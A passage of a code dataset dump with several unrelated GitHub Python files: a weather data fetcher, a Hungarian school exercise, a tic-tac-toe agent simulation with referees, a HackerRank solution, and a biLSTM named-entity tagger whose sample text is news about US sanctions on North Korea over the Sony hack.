Path(__file__).resolve().parents[1]\nCITIES_CONFIG_PATH = PROJECT_DIR_PATH / \"weather_reader\" / \"cities.json\"\n\n\ndef update_city_lat_lon() -> dict:\n \"\"\"\n Update or retrieve latitude and longitude coordinates for a list of cities from a JSON file.\n\n This function checks if the latitude and longitude coordinates of the cities in the JSON file are up to date.\n If not, it updates the coordinates and writes them back to the file.\n\n Returns:\n dict: A dictionary containing city information with updated 'lat' and 'lon' coordinates.\n \"\"\"\n try:\n with open(CITIES_CONFIG_PATH, \"r\") as file:\n data = json.load(file)\n cities = data.get(\"cities\", {})\n city_lat_lon = data.get(\"city_lat_lon\", {})\n cached_city_lat_lon = data.get(\"cached_city_lat_lon\", {})\n\n cities_key_set = set(cities.keys())\n if (cities_key_set != set(city_lat_lon.keys())) and cities_key_set.issubset(\n set(cached_city_lat_lon.keys())\n ):\n logging.info(\n \"Attempting to update city latitude and longitude coordinates from cache.\"\n )\n logging.info(f\"Starting update at: {datetime.now()}\")\n keys_to_update = cities_key_set - set(city_lat_lon.keys())\n for key in keys_to_update:\n city_lat_lon[key] = cached_city_lat_lon[key]\n data[\"city_lat_lon\"] = city_lat_lon\n with open(CITIES_CONFIG_PATH, \"w\") as file:\n json.dump(data, file, indent=4)\n logging.info(f\"Finished update at: {datetime.now()}\")\n\n elif cities_key_set != set(city_lat_lon.keys()):\n logging.info(\"Updating city latitude and longitude coordinates.\")\n logging.info(f\"Starting update at: {datetime.now()}\")\n updated_city_lat_lon = get_lat_lon(cities)\n data[\"city_lat_lon\"] = updated_city_lat_lon\n with open(CITIES_CONFIG_PATH, \"w\") as file:\n json.dump(data, file, indent=4)\n logging.info(f\"Finished update at: {datetime.now()}\")\n\n\n\n return city_lat_lon\n\n except FileNotFoundError:\n logging.error(f\"Could not find the file at {CITIES_CONFIG_PATH}\")\n except KeyError as e:\n logging.error(f\"Unexpected JSON format: Missing key {e}\")\n\n\ndef get_lat_lon(cities: dict) -> dict:\n \"\"\"\n Retrieves latitude and longitude coordinates for a list of cities.\n\n Args:\n cities (dict): A dictionary containing city information, including country and state (if applicable).\n\n Returns:\n dict: A dictionary containing city information with added 'lat' and 'lon' coordinates.\n \"\"\"\n\n base_url = SERVERS[\"LATLONG\"]\n\n for city, co_st in cities.items():\n country_code = co_st[\"country\"]\n\n if country_code == \"US\":\n q_value = f\"{city},{co_st['state']},{country_code}\"\n else:\n q_value = f\"{city},{country_code}\"\n\n params = {\"q\": q_value, \"limit\": 1, \"appid\": API_KEY}\n\n url = base_url + urlencode(params)\n response = httpx.get(url)\n response.raise_for_status()\n data = response.json()\n cities[city][\"lat\"] = data[0][\"lat\"]\n cities[city][\"lon\"] = data[0][\"lon\"]\n\n return cities\n\n\ndef main(concur_type=None, max_concur_req=None):\n \"\"\"\n Main function to orchestrate the data download and processing workflow.\n\n This function retrieves latitude and longitude coordinates for a list of cities,\n downloads weather data based on the specified concurrency type, and saves the\n valid data to a Parquet file. It also generates and logs initial and final reports\n including concurrency type, max concurrency, and elapsed time.\n\n Args:\n concur_type (str, optional): The concurrency type to use for downloading data\n (e.g., 'thread', 'process', 'coroutine'). Default is None.\n max_concur_req (int, optional): The maximum number of concurrent requests to\n make during data download. Default is None.\n\n Returns:\n None\n \"\"\"\n\n city_lat_lon = update_city_lat_lon()\n initial_report((concur_type, max_concur_req), city_lat_lon)\n t0 = time.perf_counter()\n\n if concur_type == \"thread\":\n result = download_readings_concur(\n SERVERS[\"WEATHER\"], city_lat_lon, \"thread\", max_concur_req\n )\n elif concur_type == \"process\":\n if __name__ == \"__main__\":\n result = download_readings_concur(\n SERVERS[\"WEATHER\"], city_lat_lon, \"process\", max_concur_req\n )\n elif concur_type == \"coroutine\":\n if __name__ == \"__main__\":\n result = download_readings_async(\n SERVERS[\"WEATHER\"], city_lat_lon, max_concur_req=len(city_lat_lon)\n )\n else:\n if __name__ == \"__main__\":\n result = download_readings_seq(SERVERS[\"WEATHER\"], city_lat_lon)\n\n df = result[0]\n counter = result[1]\n valid_readings_batch = validate_reading(df)\n save_to_pq(valid_readings_batch)\n save_to_db(valid_readings_batch)\n\n final_report(counter, t0)\n\n return df\n\n\nif __name__ == \"__main__\":\n print(main(concur_type='coroutine'))\n","repo_name":"codeslp/weather_reader","sub_path":"weather_reader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32605001304","text":"class telek:\n paros=False\n szelesseg=0\n kerites=\"\"\n def __init__(self,sor):\n #sor: 1 8 K \n vag=sor.replace(\"\\n\",\"\").split(\" \")\n if vag[0]==1:\n paros=False\n else:\n paros=True\n\n\ntelkek=[]\nf=open(\"kerites.txt\")\ndb=[]\nfor sor in f:\n telkek.append(telek(sor))\n\nf.close\n#t=telek(\"1 8 K\")\nprint(\"2. Feladat\")\nprint(\"Az eladott telkek száma {}\".format(len(telkek)))\nprint(\"3. Feladat\")\nif telkek[-1].paros:\n print(\"A páros oldalon adták el.\")\nelse:\n print(\"A páratlan oldalon adtál el.\")\n","repo_name":"Feenc/sulishtml","sub_path":"python/kerites.py","file_name":"kerites.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37408488509","text":"'''\r\nTic Tac Toe With Agents\r\n\r\nPlayer Agents:\r\n- NoRulesAgent: Randomizes turn taking, position, and player without regard for the rules of the game. Great at parties.\r\n- RandomAgent: Places randomly.\r\n- OneStepAheadAgent: Checks if it can win or lose in one move, but otherwise places randomly.\r\n- MinimaxAgent: Uses minimax to find the best move.\r\n\r\nSupervisor Agents:\r\n- RegularReferee: Checks if the moves are legal, and if the game is over.\r\n- NoPenaltiesReferee: Only checks to see if the game is over. Allows all moves.\r\n\r\nNote that code is not shared between agents to make the complexity of each agent clearer.\r\n\r\nUsage:\r\npython tic-tac-toe.py [debug]\r\n'''\r\nfrom enum import Enum\r\nimport random\r\nimport sys\r\n\r\n# TODO These should be in separate enums that distinguish between the player and the board state. (But if Gato can get away with mixing modalities, so can I.)\r\nX = 0\r\nO = 1\r\nEMPTY = 2\r\nREFEREE = 3\r\n\r\n# For player integer to string\r\nplayermap = {X: \"X\", O: \"O\", REFEREE: \"R\"}\r\n\r\ndef log(player: int, s: str) -> None:\r\n if len(sys.argv) > 1 and sys.argv[1] == \"debug\":\r\n print(f\"{playermap[player]}: {s}\", flush=True)\r\n\r\nclass Coordinate:\r\n def __init__(self, row: int, col: int):\r\n self.row = row\r\n self.col = col\r\n\r\n def __str__(self):\r\n return f\"({self.row}, {self.col})\"\r\n \r\n def __repr__(self):\r\n return str(self)\r\n\r\nclass Board:\r\n def __init__(self):\r\n self.board = [[EMPTY for _ in range(3)] for _ in range(3)]\r\n\r\n def place(self, coordinate: Coordinate, player: int) -> None:\r\n self.board[coordinate.row][coordinate.col] = player\r\n\r\n def pretty_print(self) -> None:\r\n for row in self.board:\r\n for col in row:\r\n if col == X:\r\n print(\"X\", end=\"\")\r\n elif col == O:\r\n print(\"O\", end=\"\")\r\n else:\r\n print(\"-\", end=\"\")\r\n print()\r\n\r\n def __hash__(self):\r\n return hash(tuple(tuple(row) for row in self.board))\r\n\r\n def iter(self):\r\n for row in self.board:\r\n for col in row:\r\n yield col\r\n \r\n def __getitem__(self, key):\r\n return self.board[key]\r\n \r\n def copy(self):\r\n new_board = Board()\r\n for row in range(3):\r\n for col in range(3):\r\n new_board.board[row][col] = self.board[row][col]\r\n return new_board\r\n\r\nclass Move:\r\n def __init__(self, coordinate: Coordinate, player: int):\r\n self.coordinate = coordinate\r\n self.player = player\r\n\r\n def __str__(self):\r\n return f\"{self.coordinate} {self.player}\"\r\n\r\nclass Agent:\r\n pass\r\n\r\nclass NoRulesAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n pass\r\n\r\n def step(self, board: Board) -> Move:\r\n turn = random.choice([True, False])\r\n\r\n if not turn:\r\n log(self.player, \"Not taking a turn.\")\r\n return None\r\n\r\n row = random.choice([0, 1, 2])\r\n col = random.choice([0, 1, 2])\r\n player = random.choice([X, O])\r\n log(self.player, f\"Placing at ({row}, {col}) as {playermap[player]}\")\r\n\r\n return Move(Coordinate(row, col), player)\r\n\r\nclass RandomAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n\r\n def step(self, board: Board) -> Move:\r\n hist = self.board_histogram(board)\r\n \r\n winner = self.check_win(board)\r\n \r\n if winner == self.player:\r\n log(self.player, \"I won!\")\r\n return None\r\n \r\n if winner != EMPTY:\r\n log(self.player, \"I lost!\")\r\n return None\r\n\r\n if hist[EMPTY] == 0:\r\n log(self.player, \"Draw!\")\r\n return None\r\n\r\n if (hist[O] >= hist[X]) and self.player == O:\r\n log(self.player, \"Not my turn, X is next.\")\r\n return None\r\n \r\n if (hist[X] > hist[O]) and self.player == X:\r\n log(self.player, \"Not my turn, O is next.\")\r\n return None\r\n \r\n random_free_spot = random.choice(self.free_spots(board))\r\n log(self.player, f\"Placing at {random_free_spot}\")\r\n\r\n return Move(random_free_spot, self.player)\r\n\r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def free_spots(self, board: Board) -> [Coordinate]:\r\n free = []\r\n for row in range(3):\r\n for col in range(3):\r\n if board[row][col] == EMPTY:\r\n free.append(Coordinate(row, col))\r\n return free\r\n \r\n def check_win(self, board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n \r\nclass OneStepAheadAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n\r\n def step(self, board: Board) -> Move:\r\n hist = self.board_histogram(board)\r\n \r\n winner = self.check_win(board)\r\n \r\n if winner == self.player:\r\n log(self.player, \"I won!\")\r\n return None\r\n \r\n if winner != EMPTY:\r\n log(self.player, \"I lost!\")\r\n return None\r\n\r\n if hist[EMPTY] == 0:\r\n log(self.player, \"Draw!\")\r\n return None\r\n\r\n if (hist[O] >= hist[X]) and self.player == O:\r\n log(self.player, \"Not my turn, X is next.\")\r\n return None\r\n \r\n if (hist[X] > hist[O]) and self.player == X:\r\n log(self.player, \"Not my turn, O is next.\")\r\n return None\r\n\r\n # Imagine my own moves\r\n imagined_board = board.copy()\r\n for move in self.free_spots(board):\r\n imagined_board.place(move, self.player)\r\n if self.check_win(imagined_board) == self.player:\r\n log(self.player, f\"I can win by placing at {move}, so I'm going to place there.\")\r\n return Move(move, self.player)\r\n imagined_board.place(move, EMPTY)\r\n\r\n # Imagine the other player's move\r\n other_player = X if self.player == O else O\r\n imagined_board = board.copy()\r\n for move in self.free_spots(board):\r\n imagined_board.place(move, other_player)\r\n if self.check_win(imagined_board) == other_player:\r\n log(self.player, f\"Other player can win by placing at {move}, so I'm going to place there.\")\r\n return Move(move, self.player)\r\n imagined_board.place(move, EMPTY)\r\n\r\n # Otherwise, place randomly\r\n random_free_spot = random.choice(self.free_spots(board))\r\n log(self.player, f\"Randomly placing at {random_free_spot}\")\r\n\r\n return Move(random_free_spot, self.player)\r\n\r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def free_spots(self, board: Board) -> [Coordinate]:\r\n free = []\r\n for row in range(3):\r\n for col in range(3):\r\n if board[row][col] == EMPTY:\r\n free.append(Coordinate(row, col))\r\n return free\r\n \r\n def check_win(self, board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n\r\nclass MinimaxAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n\r\n def step(self, board: Board) -> Move:\r\n hist = self.board_histogram(board)\r\n \r\n winner = self.check_win(board)\r\n \r\n if winner == self.player:\r\n log(self.player, \"I won!\")\r\n return None\r\n \r\n if winner != EMPTY:\r\n log(self.player, \"I lost!\")\r\n return None\r\n\r\n if hist[EMPTY] == 0:\r\n log(self.player, \"Draw!\")\r\n return None\r\n\r\n if (hist[O] >= hist[X]) and self.player == O:\r\n log(self.player, \"Not my turn, X is next.\")\r\n return None\r\n \r\n if (hist[X] > hist[O]) and self.player == X:\r\n log(self.player, \"Not my turn, O is next.\")\r\n return None\r\n\r\n # Place at a random highest value position\r\n position_values = self.position_values(board, self.player)\r\n highest_value = max(position_values.values())\r\n highest_value_positions = list({k: v for k, v in position_values.items() if v == highest_value}.keys())\r\n random_highest_value_position = random.choice(highest_value_positions)\r\n log(self.player, f\"I'm going to place at a random highest value position: {random_highest_value_position}\")\r\n return Move(random_highest_value_position, self.player)\r\n \r\n def position_values(self, board:Board, imagined_player: int) -> dict:\r\n # Note this doesn't memoize or deduplicate, so it's very slow\r\n values = {}\r\n for move in self.free_spots(board):\r\n imagined_board = board.copy()\r\n imagined_board.place(move, imagined_player)\r\n if self.check_win(imagined_board) == imagined_player:\r\n # We would win\r\n values[move] = 1\r\n elif len(self.free_spots(imagined_board)) == 0:\r\n # We would draw\r\n values[move] = 0\r\n else:\r\n # Opponent would get to move, and could choose the best position for them\r\n values[move] = max(self.position_values(imagined_board, X if imagined_player == O else O).values()) * -1 # Their win is our loss\r\n if values[move] == 1:\r\n # Found a winning move, no need to keep searching\r\n break\r\n \r\n return values\r\n\r\n def other_player(self) -> int:\r\n return X if self.player == O else O\r\n\r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def free_spots(self, board: Board) -> [Coordinate]:\r\n free = []\r\n for row in range(3):\r\n for col in range(3):\r\n if board[row][col] == EMPTY:\r\n free.append(Coordinate(row, col))\r\n return free\r\n \r\n def check_win(self, board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n\r\nclass Judgement(Enum):\r\n X_WINS = 0\r\n O_WINS = 1\r\n DRAW = 2\r\n X_PENALTY = 3\r\n O_PENALTY = 4\r\n\r\nclass RegularReferee:\r\n def __init__(self):\r\n pass\r\n\r\n def step(self, board: Board, x_move: Move, o_move: Move) -> Judgement:\r\n if x_move is not None and x_move.player != X:\r\n log(REFEREE, \"X didn't put down the correct symbol. Penalty X.\")\r\n return Judgement.X_PENALTY\r\n \r\n if o_move is not None and o_move.player != O:\r\n log(REFEREE, \"O didn't put down the correct symbol. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n\r\n if x_move is not None and board[x_move.coordinate.row][x_move.coordinate.col] != EMPTY:\r\n log(REFEREE, \"X moved on top of another piece. Penalty X.\")\r\n return Judgement.X_PENALTY\r\n\r\n if o_move is not None and board[o_move.coordinate.row][o_move.coordinate.col] != EMPTY:\r\n log(REFEREE, \"O moved on top of another piece. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n\r\n if x_move is not None and self.whose_turn(board) == O:\r\n log(REFEREE, \"Not X's turn. Penalty X.\")\r\n return Judgement.X_PENALTY\r\n\r\n if o_move is not None and self.whose_turn(board) == X:\r\n log(REFEREE, \"Not O's turn. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n \r\n if self.check_win(board) == X:\r\n log(REFEREE, \"X wins!\")\r\n return Judgement.X_WINS\r\n\r\n if self.check_win(board) == O:\r\n log(REFEREE, \"O wins!\")\r\n return Judgement.O_WINS\r\n\r\n if all(pos is not EMPTY for pos in board.iter()) and self.check_win(board) == EMPTY:\r\n log(REFEREE, \"Draw!\")\r\n return Judgement.DRAW\r\n \r\n if x_move is None and self.whose_turn(board) == X:\r\n log(REFEREE, \"X's turn but didn't go. Penalty X.\")\r\n return Judgement.X_PENALTY\r\n\r\n if o_move is None and self.whose_turn(board) == O:\r\n log(REFEREE, \"O's turn but didn't go. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n\r\n def whose_turn(self, board: Board) -> int:\r\n hist = self.board_histogram(board)\r\n if hist[O] >= hist[X]:\r\n return X\r\n return O\r\n \r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def check_win(self, board: Board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n \r\nclass NoPenaltiesReferee:\r\n def __init__(self):\r\n pass\r\n\r\n def step(self, board: Board, x_move: Move, o_move: Move) -> Judgement:\r\n if self.check_win(board) == X:\r\n log(REFEREE, \"X wins!\")\r\n return Judgement.X_WINS\r\n\r\n if self.check_win(board) == O:\r\n log(REFEREE, \"O wins!\")\r\n return Judgement.O_WINS\r\n\r\n if all(pos is not EMPTY for pos in board.iter()) and self.check_win(board) == EMPTY:\r\n log(REFEREE, \"Draw!\")\r\n return Judgement.DRAW\r\n\r\n def check_win(self, board: Board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n \r\nclass Simulator:\r\n def __init__(self, agent_x: Agent, agent_o: Agent, agent_referee):\r\n self.players = [agent_x, agent_o]\r\n self.referee = agent_referee\r\n self.board = Board()\r\n\r\n def step(self) -> Judgement:\r\n moves = [agent.step(self.board) for agent in self.players]\r\n \r\n judgement = self.referee.step(self.board, moves[X], moves[O])\r\n if judgement is not None:\r\n return judgement\r\n \r\n for move in moves:\r\n if move is not None:\r\n self.board.place(move.coordinate, move.player)\r\n\r\n return None\r\n \r\n def run(self) -> Judgement:\r\n while True:\r\n if len(sys.argv) > 1 and sys.argv[1] == \"debug\":\r\n print()\r\n self.board.pretty_print()\r\n print()\r\n judgement = self.step()\r\n if judgement is not None:\r\n if len(sys.argv) > 1 and sys.argv[1] == \"debug\":\r\n print()\r\n self.board.pretty_print()\r\n print()\r\n return judgement\r\n\r\ndef main():\r\n judgement_counts = {}\r\n \r\n for _ in range(0, 10): \r\n agent_x = OneStepAheadAgent(X)\r\n agent_o = MinimaxAgent(O)\r\n agent_referee = RegularReferee()\r\n sim = Simulator(agent_x, agent_o, agent_referee)\r\n judgement = sim.run()\r\n judgement_counts[judgement] = judgement_counts.get(judgement, 0) + 1\r\n\r\n for key in sorted(judgement_counts.keys(), key=lambda x: x.value):\r\n print(f\"{key}: {judgement_counts[key]}\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"pauldw/game-agents","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":17811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19885309341","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'plusMinus' function below.\n#\n# The function accepts INTEGER_ARRAY arr as parameter.\n#\n\ndef plusMinus(arr):\n #* Constraints:\n #* 1. : 0 < n <= 100\n #* 2. : -100 <= arr[i] <= 100\n \n if not 0 < n <= 100:\n raise TypeError(\"n must be between 0 and 100\")\n positives = 0\n negatives = 0\n zeros = 0\n for i in arr:\n if not -100 <= i <= 100:\n raise TypeError(\"integers must be between -100 and 100\")\n if i > 0:\n positives += 1\n if i < 0:\n negatives += 1\n if i ==0:\n zeros += 1\n print(f\"\"\"{format(positives/n, \".6f\")}\n{format(negatives/n, \".6f\")}\n{format(zeros/n, \".6f\")}\"\"\")\n\nif __name__ == '__main__':\n \n n = int(input().strip())\n\n arr = list(map(int, input().rstrip().split()))\n\n plusMinus(arr)\n","repo_name":"pybalt/HackerRank","sub_path":"WEEKS/1/Plus Minus/plusminus.py","file_name":"plusminus.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1201936021","text":"import numpy as np\nimport pandas as pd\nimport re\nimport os\nimport json\n\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom biLSTM import load_data, preprocess_data, tozenizer, biLSTM\n\n\ndef split_into_sentences(text):\n \"\"\"\n This function can split the entire text of Huckleberry Finn into sentences in about 0.1 seconds\n and handles many of the more painful edge cases that make sentence parsing non-trivial \n e.g. \"Mr. John Johnson Jr. was born in the U.S.A but earned his Ph.D. in Israel before joining \n Nike Inc. as an engineer. He also worked at craigslist.org as a business analyst.\"\n \"\"\"\n \n alphabets= \"([A-Za-z])\"\n prefixes = \"(Mr|St|Mrs|Ms|Dr)[.]\"\n suffixes = \"(Inc|Ltd|Jr|Sr|Co)\"\n starters = \"(Mr|Mrs|Ms|Dr|He\\s|She\\s|It\\s|They\\s|Their\\s|Our\\s|We\\s|But\\s|However\\s|That\\s|This\\s|Wherever)\"\n acronyms = \"([A-Z][.][A-Z][.](?:[A-Z][.])?)\"\n websites = \"[.](com|net|org|io|gov)\"\n \n text = \" \" + text + \" \"\n text = text.replace(\"\\n\",\" \")\n text = re.sub(prefixes,\"\\\\1\",text)\n text = re.sub(websites,\"\\\\1\",text)\n if \"Ph.D\" in text: text = text.replace(\"Ph.D.\",\"PhD\")\n text = re.sub(\"\\s\" + alphabets + \"[.] \",\" \\\\1 \",text)\n text = re.sub(acronyms+\" \"+starters,\"\\\\1 \\\\2\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\\\\3\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.] \"+starters,\" \\\\1 \\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.]\",\" \\\\1\",text)\n text = re.sub(\" \" + alphabets + \"[.]\",\" \\\\1\",text)\n if \"”\" in text: text = text.replace(\".”\",\"”.\")\n if \"\\\"\" in text: text = text.replace(\".\\\"\",\"\\\".\")\n if \"!\" in text: text = text.replace(\"!\\\"\",\"\\\"!\")\n if \"?\" in text: text = text.replace(\"?\\\"\",\"\\\"?\")\n text = text.replace(\".\",\" .\")# text = text.replace(\".\",\".\")\n text = text.replace(\"?\",\" ?\")# text = text.replace(\"?\",\"?\")\n text = text.replace(\"!\",\" !\")# text = text.replace(\"!\",\"!\")\n text = text.replace(\"\",\".\")\n \n text = text.replace('\"', ' \" ')\n text = text.replace(\"\\'s\", \" \\'s\")\n text = text.replace(\",\", \" ,\")\n \n sentences = text.split(\"\")\n sentences = sentences[:-1]\n sentences = [s.strip() for s in sentences]\n \n return sentences\n\ndef process_ner(sentence, bio):\n \n joined = []\n for w, pred in zip(sentence, bio):\n joined.append((w,pred))\n \n i = 0\n ner_list = []\n while i < len(joined):\n if joined[i][1] != 0 and joined[i][1] != 1:\n ner = []\n ner.append(joined[i])\n i += 1\n\n while joined[i][1] != 0 and joined[i][1] != 1:\n ner.append(joined[i])\n i += 1\n \n word = \" \".join([x[0] for x in ner])\n entity = ner[0][1]\n# entity = index_to_ner[ner[0][1]]\n ner_list.append((word, entity))\n else:\n i += 1\n \n return ner_list\n\n\ndef ner_extract_from_text(model, text, word_to_index):\n max_len = 70\n ner_dict = {'Geographical Entity':[], 'Organization':[], 'Person':[], 'Geopolitical Entity':[],\n 'Time indicator':[], 'Artifact':[], 'Event':[], 'Natural Phenomenon':[]}\n \n for sentence in text:\n new_sentence = sentence.lower().split()\n\n new_X=[]\n for w in new_sentence:\n try:\n new_X.append(word_to_index.get(w,1))\n except KeyError:\n new_X.append(word_to_index['OOV'])\n # 모델이 모르는 단어에 대해서는 'OOV'의 인덱스인 1로 인코딩\n\n pad_new = pad_sequences([new_X], padding=\"post\", value=0, maxlen=max_len)\n\n p = model.predict(np.array([pad_new[0]]))\n p = np.argmax(p, axis=-1)\n\n ner_list = process_ner(new_sentence, p[0])\n\n for entity in ner_list:\n if entity[1] == 2:\n ner_dict['Geographical Entity'].append(entity[0])\n elif entity[1] == 3:\n ner_dict['Time indicator'].append(entity[0])\n elif entity[1] == 4:\n ner_dict['Organization'].append(entity[0])\n elif entity[1] == 6:\n ner_dict['Person'].append(entity[0])\n elif entity[1] == 8:\n ner_dict['Geopolitical Entity'].append(entity[0])\n elif entity[1] == 11:\n ner_dict['Artifact'].append(entity[0])\n elif entity[1] == 12:\n ner_dict['Event'].append(entity[0])\n elif entity[1] == 15:\n ner_dict['Natural Phenomenon'].append(entity[0])\n \n return ner_dict\n\n\ndef main():\n nerDataPath = 'Data/entity-annotated-corpus/ner_dataset.csv'\n newsDataPath = 'Data/news/'\n model_weights = 'bi_lstm_crf_weight.h5'\n\n datapaths = os.listdir(newsDataPath)\n\n df = pd.DataFrame()\n\n for p in datapaths:\n with open(newsDataPath + p, 'r') as f:\n data = json.load(f)\n\n dataframe = pd.DataFrame.from_dict(data)\n df = df.append(dataframe)\n\n df = df.reset_index(drop=True)\n \n # word_to_index를 얻기 위한 작업\n nerData = load_data(nerDataPath)\n sentences, ner_tags = preprocess_data(nerData)\n\n src_tokenizer, _ = tozenizer(sentences, ner_tags)\n word_to_index = src_tokenizer.word_index\n\n # bi-LSTM CRF model\n model = biLSTM()\n print(\"loading weight to bi-LSTM model...\")\n model.load_weights(model_weights)\n\n #\n ner_df = pd.DataFrame()\n for i in range(df.shape[0]):\n # if i % 1000 == 0:\n print(i, \"rows are done\")\n\n row = df.iloc[0]\n body = row[' body']\n sentence_split = split_into_sentences(body)\n\n ner_dict = ner_extract_from_text(model=model, text=sentence_split, word_to_index=word_to_index)\n\n val_list = list(ner_dict.values())\n joined_val_list = []\n for val in val_list:\n joined_val = ','.join(val)\n joined_val_list.append(joined_val)\n\n ner = pd.DataFrame(data=[joined_val_list], columns=list(ner_dict.keys()))\n ner_df.append(ner)\n\n ner_df = ner_df.reset_index(drop=True)\n\n print(\"NER tagging process done\")\n\n merged_df = pd.merge(df, ner_df)\n merged_df.to_csv(\"Data/ner_result.csv\", mode='w')\n\n print(\"saved to csv file.\")\n\nif __name__ == \"__main__\":\n main()\n\n\n'''\ntext = ['The United States announced retaliatory sanctions on North Korea on Friday in response to the communist nation \\'s alleged cyber-attacks on Sony Pictures , warning the actions are just the \" first aspect \" of its response .',\n 'President Barack Obama signed an executive order authorizing additional sanctions on North Korean individuals and entities in response to the North \\'s \" ongoing provocative , destabilizing , and repressive actions and policies , particularly its destructive and coercive cyber attack on Sony , \" the White House said in a statement .',\n \"Three North Korean entities and 10 officials were named in the sanctions , including the Reconnaissance General Bureau , Pyongyang 's primary intelligence organization , accused of arms trading and other activities banned under U.N. resolutions , according to the Treasury Department .\",\n 'Though those sanctioned are barred from using the U.S. financial system and U.S. citizens are banned from doing business with them , the measures are considered largely symbolic because the North has already been under a string of international sanctions and those newly sanctioned are not believed to have any dealings with the U.S. \" We take seriously North Korea \\'s attack that aimed to create destructive financial effects on a U.S. company and to threaten artists and other individuals with the goal of restricting their\\xa0right to free expression , \" the White House said \" .',\n \"As the president has said , our response to North Korea 's attack against Sony Pictures Entertainment will be proportional , and will take place at a time and in a manner of our choosing .\",\n 'Today \\'s actions are the first aspect of our response , \" it said .',\n 'The FBI has determined that North Korea was behind the hack on Sony , confirming widespread suspicions pointing to the North that has expressed strong anger at a Sony movie , \" The Interview , \" which involves a plot to assassinate North Korean leader Kim Jong-un .',\n 'Obama has since vowed to \" respond proportionally \" to the attacks .',\n 'North Korea has denied any responsibility , though it lauded the Sony hack as a \" righteous deed \" .',\n '\" The order is not targeted at the people of North Korea , but rather is aimed at the government of North Korea and its activities that threaten the United States and others , \" Obama said in a letter to House of Representatives and Senate leaders .',\n 'The two other newly sanctioned North Korean entities are Korea Mining Development and Trading Corp .',\n '(KOMID) and Korea Tangun Trading Corp .',\n 'Eight of the 10 sanctioned individuals were KOMID officials stationed in Iran , Syria , Russia and Namibia .',\n \"KOMID is the North 's primary arms dealer and main exporter of goods and equipment related to ballistic missiles and conventional weapons , according to the Treasury Department .\",\n 'The company was previously sanctioned by the U.S. and the United Nations , 